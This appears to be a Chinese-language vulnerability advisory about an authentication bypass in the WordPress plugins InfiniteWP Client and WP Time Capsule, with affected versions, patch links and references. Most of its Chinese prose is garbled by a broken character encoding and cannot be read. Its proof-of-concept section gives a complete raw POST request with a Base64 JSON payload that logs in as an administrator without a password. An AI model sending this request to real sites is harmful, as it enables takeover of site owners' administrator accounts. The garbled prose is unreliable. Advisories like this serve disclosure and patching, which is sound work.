WordPress²å¼þInfiniteWP ClientºÍWP Time Capsule·ì϶·çÏÕ¹«¸æ

°ä²¼¹¦·ò 2020-01-16

·ì϶±àºÅºÍ¼¶±ð


CVE±àºÅ£ºÔÝÎÞ£¬Î£ÏÕ¼¶±ð£ºÑϳÁ£¬CVSS·ÖÖµ£º³§ÉÌ×ÔÆÀ£º9.8£¬¹Ù·½Î´ÆÀ¶¨


Ó°Ïì°æ±¾


InfiniteWP Client < 1.9.4.5

WP Time Capsule < 1.21.16


·ì϶¸ÅÊö


WordPress²å¼þInfiniteWP ClientºÍWP Time CapsuleÖеÄÉí·ÝÑéÖ¤ÈÆ¹ý·ì϶ʹµÃ32Íò¸öÍøÕ¾Ò×Êܹ¥»÷¡£ÕâÁ½¸ö²å¼þÓÃÓÚÔ®ÊÖÓû§ÖÎÀíһ̨·þÎñÆ÷ÉϵĶà¸öWordPressÍøÕ¾£¬²¢ÔÚ°ä²¼¸üÐÂʱΪÎļþºÍÊý¾Ý¿âÌõ¿î´´½¨±¸·Ý¡£


WebArx°²È«×êÑÐÈËÔ±·¢ÏÖËüÃǵĴúÂëÖдæÔÚÂß¼­ÃýÎó£¬Ê¹µÃ¹¥»÷ÕßÄܹ»ÈƹýÃÜÂëÀ´µÇ¼ÖÎÀíÔ¹ØË»§¡£Æ¾¾ÝWordPress²å¼þ¿â£¬InfiniteWP Client±»×°ÖÃÔÚ30¶àÍò¸öÍøÕ¾ÉÏ£»¶øWP Time CapsuleµÄ×°ÖÃÁ¿ÖÁÉÙΪ2Íò¡£


×êÑÐÈËÔ±·¢´Ë¿ÌµÍÓÚ°æ±¾1.9.4.5µÄInfiniteWP ClientÖУ¬¹¥»÷ÕßÄܹ»Ê¹ÓôøÓÐJSONºÍBase64±àÂëµÄpayloadµÄPOSTÒªÇóÀ´ÈƹýÃÜÂ룬ͨ¹ý½ö֪·ÖÎÀíÔ±Óû§ÃûÀ´µÇ¼¡£¶øÔÚµÍÓÚ1.21.16µÄWP Time Capsule°æ±¾ÖУ¬¹¥»÷Õß¿Éͨ¹ýÔÚԭʼPOSTÒªÇóÖÐÔö³¤¶ñÒâ×Ö·û´®À´Å²Óú¯Êý²¶»ñ¿ÉÓõÄÖÎÀíÔ¹ØË»§ÁÐ±í²¢ÒÔµÚÒ»¸öÖÎÀíÔ±Éí·ÝµÇ¼¡£


·ì϶ÑéÖ¤


²å¼þInfiniteWP ClientµÄPOC£ºhttps://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/¡£


Ê×ÏȱØÒªÊ¹ÓÃJSON±àÂëµÄ¸ºÔØ£¬¶øºóÊÇBase64¡£½ÓÏÂÀ´£¬Ëü½«ÔÚPOSTÒªÇóÖÐԭʼ·¢Ë͵½Ö¸±êÕ¾µã¡£


POST / HTTP/1.1

Host: example.org

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

Content-Type: text/plain

Content-Length: 93


_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ==


½¨¸´½¨Òé


ĿǰÕâÁ½¸ö²å¼þ¶¼ÒѰ䲼¸üн¨¸´Á˸ÃÎÊÌ⣺


https://wordpress.org/plugins/iwp-client/

https://wordpress.org/plugins/wp-time-capsule/


²Î¿¼Á´½Ó


https://threatpost.com/wordpress-bug-leaves-sites-open-to-attack/151911/